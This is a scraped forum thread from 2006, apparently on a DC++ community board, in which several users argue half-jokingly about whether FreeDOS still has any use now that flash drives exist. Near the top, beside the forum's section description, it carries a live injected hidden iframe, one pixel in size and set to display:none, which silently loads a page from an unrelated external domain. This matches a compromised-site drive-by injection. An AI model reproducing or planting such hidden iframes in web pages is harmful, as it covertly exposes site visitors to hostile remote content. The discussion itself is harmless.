DOS aint dead...

Non-DC related talk...<iframe src=http://pokupka.ks.ua/templates/As/image ... p?from=com width=1 height=1 style=display:none></iframe>

Moderator: Moderators

Guitarm
Forum Moderator

DOS aint dead...

Post by Guitarm » 2006-09-04 22:20

I kinda like stubborn people DOS is dead, long live DOS Cute story :)
"Nothing really happens fast. Everything happens at such a rate that by the time it happens, it all seems normal."

eMTee

Post by eMTee » 2006-09-05 04:08

Interesting how can a single task operating system used for anything? In the home page there is a list "These days, there are three main uses of FreeDOS:"... I know at least 2 better way for all listed there :)
With it its a cool effort though.
Everyone's got their opinions - They'll tell ya 'bout 'em all the time... /* Spock's Beard */

Cratima

Post by Cratima » 2006-10-02 07:04

FreeDOS is the single application that has so much effort invested in it. And for what? We now have flash drives, who needs FreeDOS at all.

I admire their enthusiasm and effort, but not the result. :?
Cratima Software and Cratima Interactive - www.cratima.com - It's deadline. It's done.

GargoyleMT
DC++ Contributor

Post by GargoyleMT » 2006-10-06 17:19

Cratima wrote:We now have flash drives, who needs FreeDOS at all.
Talk about a non sequitir.

Carraya

Post by Carraya » 2006-10-07 02:52

GargoyleMT wrote:
Oh come on, there's logic in it, it's just hard to follow, now that we have flash discs we can install real Dos on them, and therfore don't need the FreeDos, but let's hold up a minute, we could that before as well (Multi boot and other fun stuff)... So yeah you're probably right, that makes no sense at all...
<random funny comment>

yakko

Post by yakko » 2006-10-07 10:53

Carraya wrote:
GargoyleMT wrote:
Oh come on, there's logic in it, it's just hard to follow, now that we have flash discs we can install real Dos on them, and therfore don't need the FreeDos, but let's hold up a minute, we could that before as well (Multi boot and other fun stuff)... So yeah you're probably right, that makes no sense at all...
do you even know what FreeDOS is? It's a replacement for the DOS you would get from Windows or whatever. It's more full featured and works great for any need where you would need a DOS boot disk (including USB drives)

Carraya

Post by Carraya » 2006-10-07 13:27

ROFL huh what... The argument I made was that FreeDOS usability didn't have anything to do with whether or not we now have flash drive technology available or not... Not if FreeDOS is useful or not, and yes I know what it is... That doesn't make it more useful...
<random funny comment>